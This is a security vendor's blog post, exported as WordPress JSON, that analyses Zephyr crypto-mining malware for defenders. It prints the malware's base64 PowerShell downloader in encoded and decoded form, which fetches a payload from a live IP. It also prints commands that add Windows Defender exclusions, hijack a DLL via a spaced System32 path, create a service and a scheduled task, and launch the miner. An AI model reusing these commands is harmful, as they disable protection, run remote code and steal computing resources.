{"id":93017,"date":"2024-12-02T20:45:15","date_gmt":"2024-12-02T15:15:15","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=93017"},"modified":"2026-02-02T17:53:09","modified_gmt":"2026-02-02T12:23:09","slug":"crypto-mining-malware-zephyr","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/crypto-mining-malware-zephyr\/","title":{"rendered":"Persistence in the Shadows: A Study of Zephyr Miner Exploiting System Services"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"93017\" class=\"elementor elementor-93017\">\n\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-548b003f e-flex e-con-boxed e-con e-parent\" data-id=\"548b003f\" data-element_type=\"container\" data-settings=\"{&quot;content_width&quot;:&quot;boxed&quot;}\" data-core-v316-plus=\"true\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-65a98e00 elementor-widget elementor-widget-text-editor\" data-id=\"65a98e00\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<style>\/*! elementor - v3.16.0 - 17-10-2023 *\/\n.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#69727d;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#69727d;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}<\/style>\t\t\t\t<h2><strong>Crypto Mining<\/strong><\/h2>\nCrypto mining is the process by which individuals or organizations use computer power to solve complex mathematical problems, validating transactions on a blockchain network and earning cryptocurrency coins. This activity has gained popularity with the increasing value of digital currencies, leading some malicious actors to exploit users\u2019 devices for their own gain. Cybercriminals often employ tactics like phishing emails or deceptive downloads to install mining software, also called crypto mining malware without users&#8217; knowledge. Once installed, this software can drain the device&#8217;s CPU and GPU resources, causing slowdowns, overheating, and even hardware damage over time.\n\nThese mining scripts typically run quietly in the background, disguising themselves as legitimate processes, which makes them hard to detect. They may also use obfuscation techniques to evade security software, communicate with external servers to send mined coins, and alter system settings to maintain their operations. Understanding these risks is crucial for users to protect their systems from being exploited and to ensure their devices run efficiently.\n<h2><strong>Zephyr Coin<\/strong><\/h2>\nZephyr Coin (ZEPH) was launched in 2018 as a digital currency that prioritizes privacy and security for online transactions. It was created to provide a safe way for people to send and receive money without exposing their personal information. Zephyr Coin operates on a system called proof-of-stake, which means that users can earn rewards simply by holding onto their coins. This not only makes the network more secure but also encourages more people to participate. Over the years, Zephyr Coin has gained attention for its strong privacy features and user-friendly design, making it a notable choice in the cryptocurrency world. As the popularity of Zephyr Coin grows, so does the interest from cybercriminals looking to exploit users for their computing power, showing that users need to be more careful and take extra security steps to protect their resources.\n<h2><strong>Technical Details<\/strong><\/h2>\nThe variant of this malware spreads in total four ways:\n<ol>\n \t<li>Visual Basic Script &#8211; VBS<\/li>\n \t<li>Batch Processing File &#8211; BAT<\/li>\n \t<li>PowerShell Script \u2013 PS1<\/li>\n \t<li>Portable Executable &#8211; PE<\/li>\n<\/ol>\n<h3><strong>1. Visual Basic Script \u2013 VBS execution process<\/strong><\/h3>\nIt first checks if a specific folder (C:\\Windows \\System32\\010101) exists, and if not, it attempts to delete the entire directory using a PowerShell command. The script then creates a new directory within C:\\Windows \\System32 and copies a printui.exe and a file name starting with \u201cx\u201dd{6}.dat, which it renames to printui.dll. Using paths with spaces, such as C:\\Windows \\System32, suggests a deliberate attempt to obfuscate the script&#8217;s intentions while manipulating system resources. After these actions, it runs the copied executable, potentially facilitating further malicious activities that match step 5 in the below execution.<strong>\u00a0<\/strong>\n<h3><strong>2. Batch Processing File -BAT execution description<\/strong><\/h3>\nThe script begins by setting the code page to UTF-8 and attempts to open a random folder in the parent directory. It checks for the existence of the &#8220;printui.dll&#8221; file in the &#8220;System32&#8221; folder of the system drive. If the file is not found, it removes the &#8220;Windows&#8221; folder from the system drive using the &#8220;rmdir&#8221; command with the &#8220;\/S&#8221; and &#8220;\/Q&#8221; options. It then creates a new folder with the\u00a0name &#8220;Windows \\System32&#8221; directory and copies &#8220;printui.exe&#8221; from the original location into this new folder. Additionally, it transfers a file name starting with \u201cx\u201dd{6}.dat, which it renames to printui.dll. The script subsequently verifies the presence of both &#8220;printui.exe&#8221; and &#8220;printui.dll&#8221;; if both are present, it executes &#8220;printui.exe.&#8221; If the file is missing, the script removes the entire &#8220;Windows \\System32&#8221; folder. After these actions, it runs the copied executable, potentially facilitating further malicious activities which matches from step 5 in the\u00a0below execution.\n<h3><strong>3. PowerShell Execution description:<\/strong><\/h3>\nThis is the base64 encoding command\n\npowershell -Command &#8220;$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String\n\n\u201cZm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9\u201d\n\n<strong>After decoding<\/strong>\n\n<code>for (;;){<\/code>\n<code>(New-Object System.Net.WebClient).DownloadFile(\"http:\/\/37.1.196.35\/un2\/botui.dat\", \"C:\\Users\\Public\\pyld.dll\");\n<\/code><code>Start-Sleep -Seconds 2;\n<\/code><code>if (Test-Path \"C:\\Users\\Public\\pyld.dll\"){\n<\/code><code>cmd \/c mkdir \"\\\\?\\C:\\Windows \\System32\";\n<\/code><code>cmd \/c xcopy \/y \"C:\\Windows\\System32\\printui.exe\" \"C:\\Windows \\System32\";\n<\/code><code>cmd \/c move \/y \"C:\\Users\\Public\\pyld.dll\" \"C:\\Windows \\System32\\printui.dll\";\n<\/code><code>Start-Sleep -Seconds 2;\n<\/code><code>Start-Process -FilePath \"C:\\Windows \\System32\\printui.exe\";\n<\/code><code>break;\n<\/code><code>}\n<\/code><code>else{ Start-Sleep -Seconds 60;\n<\/code><code>}\n<\/code><code>}<\/code>\n\nThe Base64-encoded script, upon decoding, contains a PowerShell command that downloads a file from the URL (hxxp[:]\/\/37.1.196.35\/un2\/botui.dat). It follows the same execution process as the\u00a0above scripts and after printui.exe is launched it operates same as the executable from step 5.\n\n<figure id=\"attachment_93024\" aria-describedby=\"caption-attachment-93024\" style=\"width: 443px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93024 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-1-Execution-Flowchart-443x390.png\" alt=\"\" width=\"443\" height=\"390\" \/><figcaption id=\"caption-attachment-93024\" class=\"wp-caption-text\">Figure 1: Execution Flowchart<\/figcaption><\/figure>\n<h3><strong>4. Portable Executable Format Execution process:<\/strong><\/h3>\nOne of the methods by which this malware spreads is through executable files (EXE\/DLL). When users unknowingly download and run these malicious executables, they trigger the installation process of the malware on their systems.\n\nWhen user executes the malicious EXE(miner.exe)or a xd{6}.dat(regex file name) which is a DLL file. The entire behavior is explained in below steps:\n<ol>\n \t<li>When the malware was\u00a0executed it created an\u00a0exclusion to Windows Defender for the folder with the help of PowerShell.\n<ul>\n \t<li>powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;C:\\Windows\\System32<\/li>\n<\/ul>\n<\/li>\n \t<li>Then it launches usvcinsta64.exe in the system32 folder and starts running.\n\n<figure id=\"attachment_93028\" aria-describedby=\"caption-attachment-93028\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93028 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-2-usvcinsta64.exe-getting-installed-in-sys32-650x220.png\" alt=\"\" width=\"650\" height=\"220\" \/><figcaption id=\"caption-attachment-93028\" class=\"wp-caption-text\">Figure 2 usvcinsta64.exe getting installed in sys32<\/figcaption><\/figure><\/li>\n \t<li>Usvcinsta64.exe will do again exclusion for<\/li>\n<\/ol>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;C:\\Windows\\System32&#8217;;&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\nand also, for the path where there is a space after windows &#8216;C:\\Windows \\System32\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;C:\\Windows \\System32&#8217;;&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\nThen it makes a directory with cmd.exe \/c mkdir &#8220;\\\\?\\C:\\Windows \\System32&#8221;. So, there will be two directories with the same name. One is an old one and the other highlighted one has with recent date.\nThe attacker creates a similar folder structure to Windows system folders but with a space in order to trick the machine and execute the desired malware first.\n\n<figure id=\"attachment_93029\" aria-describedby=\"caption-attachment-93029\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93029 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-3-Windows-with-space-in-getting-created-in-Root-C-650x343.png\" alt=\"\" width=\"650\" height=\"343\" \/><figcaption id=\"caption-attachment-93029\" class=\"wp-caption-text\">Figure 3 Windows with space in getting created in Root C<\/figcaption><\/figure>\n\n4. As we can see in Figure 3, it does all the common operations that are mentioned in Points A, B, C. Then it starts executing printui.exe from the folder that is created by the malware (C:\\Windows \\System32).\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c start &#8220;&#8221; &#8220;C:\\Windows \\System32\\printui.exe&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93030\" aria-describedby=\"caption-attachment-93030\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93030 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-4-Xcopying-printui.exe_-650x192.png\" alt=\"\" width=\"650\" height=\"192\" \/><figcaption id=\"caption-attachment-93030\" class=\"wp-caption-text\">Figure 4 Xcopying printui.exe<\/figcaption><\/figure>\n\n<figure id=\"attachment_93031\" aria-describedby=\"caption-attachment-93031\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93031 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-5-Starting-printui.exe_-650x216.png\" alt=\"\" width=\"650\" height=\"216\" \/><figcaption id=\"caption-attachment-93031\" class=\"wp-caption-text\">Figure 5 Starting printui.exe<\/figcaption><\/figure>\n\nHere from below the main execution starts\n\n5. After printui.exe gets started it again creates an exclusion path for windows \\ system32 and windows\\system32 for the safe side. Then it launches cmd for service creation and registry key creation for that service.\n\nIt also copies the\u00a0.dat file to the system32 folder and creates a service for the .dat file. Note, here the service name varies for every variant. This is a random service name given to the malware followed by \u201cX\u201d and the format for this xd{6}.dat.\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c sc create x638273 binPath= &#8220;C:\\Windows\\System32\\svchost.exe -k DcomLaunch&#8221; type= own start= auto &amp;&amp; reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\x310586\\Parameters \/v ServiceDll \/t REG_EXPAND_SZ \/d &#8220;C:\\Windows\\System32\\x310586.dat&#8221; \/f &amp;&amp; sc start x638273<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93032\" aria-describedby=\"caption-attachment-93032\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93032 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-6-Random-name-generated-to-dat-file-650x139.png\" alt=\"\" width=\"650\" height=\"139\" \/><figcaption id=\"caption-attachment-93032\" class=\"wp-caption-text\">Figure 6 Random name generated to dat file<\/figcaption><\/figure>\n\nAfter the service got registered, it is up and running under service.exe which we will discuss a in the point 9.\n\n6. Then it will start console_zero.exe from system32\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c start &#8220;&#8221; &#8220;C:\\Windows\\System32\\console_zero.exe.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n7. The main task for console_zero.exe is it checks for any existing scheduled tasks named &#8220;console_zero,&#8221; ensuring that old instances are removed. Subsequently, it creates a new scheduled task that is set to run exe with the highest privileges every time the user logs on to the system.\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c schtasks \/create \/tn &#8220;console_zero&#8221; \/sc ONLOGON \/tr &#8220;C:\\Windows\\System32\\console_zero.exe&#8221; \/rl HIGHEST \/f<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n8. After executing all and ensuring the persistence in two forms one is as service, and one is as schedule task. Then the usvcinsta64.exe will get deleted and windows \\system32 folder is getting deleted and the main sample too. This helps to clear all the traces that are present in system.\n\n<figure id=\"attachment_93033\" aria-describedby=\"caption-attachment-93033\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93033 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-7-Malware-self-deleting-650x134.png\" alt=\"\" width=\"650\" height=\"134\" \/><figcaption id=\"caption-attachment-93033\" class=\"wp-caption-text\">Figure 7 Malware self-deleting<\/figcaption><\/figure>\n\nThis is total execution of malware. But the main part of the malware lies in the service that is running in the system. Will take a look on the service that is running under svchost.exe.\n<h2><strong>Service Details<\/strong><\/h2>\n9. The service that is running under svchost.exe is creating exclusion for C,D,E,F folder from Windows Defender with the following command:\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;c:\\windows\\system32&#8217;;&#8221;<\/li>\n \t<li>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;E:\\&#8217;;&#8221;<\/li>\n \t<li>C:\\Windows\\System32\\cmd.exe cmd.exe \/c powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;F:\\&#8217;;&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n10. Then it launched cmd.exe connects to the mining pool (2miners.com:2222), user credentials, and resource usage limits (max CPU usage of 50%). It is mining Zephyr coin.\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>C:\\Windows\\System32\\cmd.exe cmd.exe \/c x310586.dat -o zeph.2miners.com:2222 -u ZEPHs8rW7aS82Z52aS3qh35jPcaYKHdrufzLCCCyXmqdFC8wRPpCTdLgoA1CaqJDa72zG8ZhsMmdMZyJkqDTadbSPbwt1s2ppYr &#8211;rig-id=x421236 &#8211;max-cpu-usage=50<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93035\" aria-describedby=\"caption-attachment-93035\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93035 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Wallet-ID-components-650x126.png\" alt=\"\" width=\"650\" height=\"126\" \/><figcaption id=\"caption-attachment-93035\" class=\"wp-caption-text\">Figure 8 Wallet ID components<\/figcaption><\/figure>\n<ol>\n \t<li>x310586dat \u2013 Which program is launched<\/li>\n \t<li>2miners.com:2222- Specifies the pool domain address with port<\/li>\n \t<li>ZEPHs8rW7aS82Z52aS3qh35jPcaYKHdrufzLCCCyXmqdFC8wRPpCTdLgoA1CaqJDa72zG8ZhsMmdMZyJkqDTadbSPbwt1s2ppYr \u2013 Address of the wallet<\/li>\n \t<li>Rig-id:x419395 &#8211; Unique identifier for a mining setup.<\/li>\n \t<li>Max-cpu-usage=50- indicates that the malware is configured to use a maximum of 50% of the CPU&#8217;s processing power for mining tasks.<\/li>\n<\/ol>\n<h2><strong>Zephyr Wallet Details<\/strong><\/h2>\nIn total there are two wallet IDs that are associated with this type of campaign. The below images showcase the statistics related to Zephyr&#8217;s wallet address present while the\u00a0service is running:\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>ZEPHs8rW7aS82Z52aS3qh35jPcaYKHdrufzLCCCyXmqdFC8wRPpCTdLgoA1CaqJDa72zG8ZhsMmdMZyJkqDTadbSPbwt1s2ppYr<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93034\" aria-describedby=\"caption-attachment-93034\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93034 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-9-Zephyr-miners-wallet-details-650x175.png\" alt=\"\" width=\"650\" height=\"175\" \/><figcaption id=\"caption-attachment-93034\" class=\"wp-caption-text\">Figure 9 Zephyr miner&#8217;s wallet details<\/figcaption><\/figure>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>ZEPHs7Ep8zTafTpfMEduqd5xGYLEvBJwcHXRpbA92fMjVJcji9EXQsDP5QQLVxmn7UTSTFqpmaVdE2ydBwupJctU2ggmsNvqxfd<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93026\" aria-describedby=\"caption-attachment-93026\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93026 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Fgire-10-Zephyr-miners-details-for-another-wallet-ID-650x163.png\" alt=\"\" width=\"650\" height=\"163\" \/><figcaption id=\"caption-attachment-93026\" class=\"wp-caption-text\">Figure 10 Zephyr miner&#8217;s details for another wallet ID<\/figcaption><\/figure>\n<h2><strong>Summary<\/strong><\/h2>\nThis malware is a variant of a\u00a0crypto miner that mines Zephyr coins. It is not like other miners; it is in a more sophisticated form imbibing all the possible techniques to be persistent and evade detection. The overall execution methods are as follows:\n<ol>\n \t<li><strong>Initial Execution<\/strong>: The malware begins with a script\/an executable, which triggers a series of commands through exe and PowerShell.<\/li>\n \t<li><strong>Exclusion from Windows Defender<\/strong>: The malware adds the &#8220;C:\\Windows\\System32&#8221; directory to Windows Defender&#8217;s exclusion list multiple times to prevent it\u00a0from getting detected.<\/li>\n \t<li><strong>Search Order Hijacking Via Additional Space in Path: <\/strong>A similar folder to \u201cC:\\windows\\system32\u201d as \u201cC:\\Windows\\ Sytem32\u201d is being created to hijack and execute the desired malware.<\/li>\n \t<li><strong>Service Creation<\/strong>: The malware attempts to create a new service named x310586{random 6 digits) that runs under exe pointing to a malicious DLL (x638273.dat). This allows the malware to run persistently as a service, starting automatically with system boot.<\/li>\n \t<li><strong>Multiple files for Multiple operations<\/strong>: The malware launch usvcinsta64.exe for creating \u201cC:\\Windows\\ Sytem32\u201d\u00a0 and to launch exe for service creation, and console_zero for scheduling tasks.<\/li>\n \t<li><strong>Cleanup Operations<\/strong>: At last, it deletes all the traces except for the ones that are involved in persistence.<\/li>\n \t<li><strong>Mining Activity<\/strong>: The malware registered as service is connecting to the mining pool (2miners.com:2222) which mines and add coins to the address specified in the commandline.<\/li>\n<\/ol>\nOverall, this chain of execution highlights the malware&#8217;s primary functions: evading detection, creating a cryptocurrency mining operation, and maintaining persistence within the system. This behaviour is indicative of a broader trend in malware that seeks to exploit system resources for financial gain.\n<h2><strong>Mitigation<\/strong><\/h2>\nTo mitigate the risk of malware that exploits system resources for cryptocurrency mining, several proactive measures should be taken.\n<ul>\n \t<li>Regular software updates are essential to protect against vulnerabilities in operating systems and applications.<\/li>\n \t<li>Utilizing strong anti-virus software with real-time protection and periodic scans can help detect and remove malicious software.<\/li>\n \t<li>Limiting administrative privileges can prevent unauthorized installations, while resource monitoring tools can identify unusual CPU and GPU usage indicative of mining activities.<\/li>\n \t<li>Configuring firewalls to block unauthorized outbound connections, particularly to known mining pools, adds another layer of security.<\/li>\n<\/ul>\nTogether, these strategies can significantly enhance an organization&#8217;s defense against cryptocurrency mining malware.\n<h2><strong>Quick Heal Detection<\/strong><\/h2>\n<a href=\"https:\/\/www.quickheal.co.in\/home-users\/quick-heal-antivirus-pro\">Quick Heal Antivirus<\/a> effectively detects all variants of crypto mining malware, including both PE and non-PE files, through static and dynamic analysis methods, ensuring immediate identification of threats responsible for mining activities\n<h3>IOCs<\/h3>\n<a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Zephyr-CryptoMiner-IOCs.xlsx\">Zephyr Miner IOCs<\/a>\n\n&nbsp;\n\nALSO READ:\u00a0<a href=\"https:\/\/blogs.quickheal.com\/proactive-measures-to-safeguard-against-the-ransomware-menace\/\">Proactive Measures to Safeguard against the Ransomware Menace<\/a>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Crypto Mining Crypto mining is the process by which individuals or organizations use computer power to solve complex mathematical problems, validating transactions on a blockchain network and earning cryptocurrency coins. This activity has gained popularity with the increasing value of digital currencies, leading some malicious actors to exploit users\u2019 devices for their own gain. Cybercriminals [&hellip;]<\/p>\n","protected":false},"author":104,"featured_media":93072,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1653,1613,1672,24,1],"tags":[2040,2045,1614,1568,49],"class_list":["post-93017","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-antivirus","category-cryptojacking","category-cryptomining","category-malware","category-uncategorized","tag-quickheal-cybersecurity-cyberawareness","tag-zephyr-coin","tag-crypto-mining","tag-cryptojacking","tag-malware"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/93017"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/104"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=93017"}],"version-history":[{"count":3,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/93017\/revisions"}],"predecessor-version":[{"id":93075,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/93017\/revisions\/93075"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/93072"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=93017"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=93017"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=93017"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}